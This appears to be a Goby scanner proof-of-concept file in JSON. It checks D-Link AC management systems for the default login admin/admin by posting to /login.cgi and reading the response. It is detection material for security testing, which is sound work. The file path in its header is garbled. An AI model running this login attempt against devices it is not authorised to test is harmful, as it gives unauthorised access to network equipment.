Goby/json/D-Link AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡...

55 lines
2.0 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "D-Link AC集中管理系统默认弱口令",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"",
"Description": "D-Link AC管理系统存在默认账号密码可被获取敏感信息",
"Product": "D-Link AC管理系统",
"Homepage": "http://www.dlink.com.cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-02-07 23:13:20",
"GobyVersion": "1.8.237"
}